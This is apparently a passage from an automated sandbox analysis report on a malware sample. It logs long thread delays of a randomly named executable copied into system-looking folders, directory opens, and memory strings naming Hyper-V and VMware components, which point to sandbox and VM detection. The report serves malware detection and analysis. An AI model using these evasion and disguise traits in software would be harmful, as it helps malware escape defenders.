                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 597609
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 597343
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 597078
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596924
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596760
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596484
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 596261
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 595937
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 595234
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 595074
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594893
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 300000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594644
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594453
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594234
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 594031
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593812
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593590
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593375
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 593046
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 592796
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 592218
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591906
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591734
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591484
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 591274
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590984
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590830
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590671
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590531
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590386
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590254
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 590093
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589910
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589453
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589280
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589162
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 589042
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588872
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588757
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588645
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588515
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588343
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588171
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 588013
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587880
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587750
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587640
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587531
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587421
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587298
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 587137
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586654
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586528
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586386
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586231
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586117
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 586000
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585890
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585774
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585656
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585546
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585436
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585324
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585214
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 585109
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584902
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584795
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584678
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584542
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 584349
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583946
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583822
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583707
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583564
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583437
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583327
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583209
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 583079
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582963
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582858
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582750
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582640
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582530
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582406
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582218
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 582041
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 581828
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 581225
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580984
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580871
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580765
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580619
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 580484
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SHyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.mum
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.catg-
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YMicrosoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Zamd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6-
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: camd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda.manifestc
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b]
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mumt
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SHyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMicrosoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-d..ers-vmswitch-common_31bf3856ad364e35_10.0.19041.1_none_e5de88ec9eb30808.manifest/CY
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jamd64_microsoft-hyper-v-guest-network-drivers_31bf3856ad364e35_10.0.19041.1_none_2cfac380b9544760.manifestt
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YHyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mumP
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aamd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7.manifest
                                Source: Everything.exe, 0000000A.00000003.2245320628.0000000000CC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: etgwfyhLlpxWsCvMcidzguSlntfrNsCe
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RMicrosoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat'"
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.19041.928_none_b394b845725c83f9.manifestl
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15.manifest
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lamd64_microsoft-hyper-v-m..wallrules.resources_31bf3856ad364e35_10.0.19041.1_en-us_90826ff4620798e4.manifestl
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat$"
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Oamd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: namd64_microsoft-hyper-v-o..n-merged-deployment_31bf3856ad364e35_10.0.19041.1566_none_4d0af6f3ee4c927e.manifest
                                Source: Everything.exe, 00000014.00000003.2344012623.00000000059F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmci.sys
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMicrosoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bamd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mamd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87.manifestb
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aamd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jamd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b.manifest8
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5
                                Source: Everything.exe, 00000014.00000003.2346194575.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.catM%t
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mumn
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NMicrosoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: namd64_microsoft-hyper-v-o..s-merged-deployment_31bf3856ad364e35_10.0.19041.1741_none_68a612f12d9ba982.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YMicrosoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.mum
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eamd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580P
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b.manifest
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mumw
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Ramd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611s}B
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TMicrosoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat'"t
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: namd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c.manifest
                                Source: Everything.exe, 00000014.00000003.2330717207.0000000002C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aamd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b{f
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.mumO
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZMicrosoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat'"t
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZMicrosoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat'"
                                Source: Everything.exe, 00000014.00000003.2337417285.00000000051F1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2337228705.00000000051D1000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mumn
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000014.00000003.2339073480.0000000005581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kamd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd.manifest
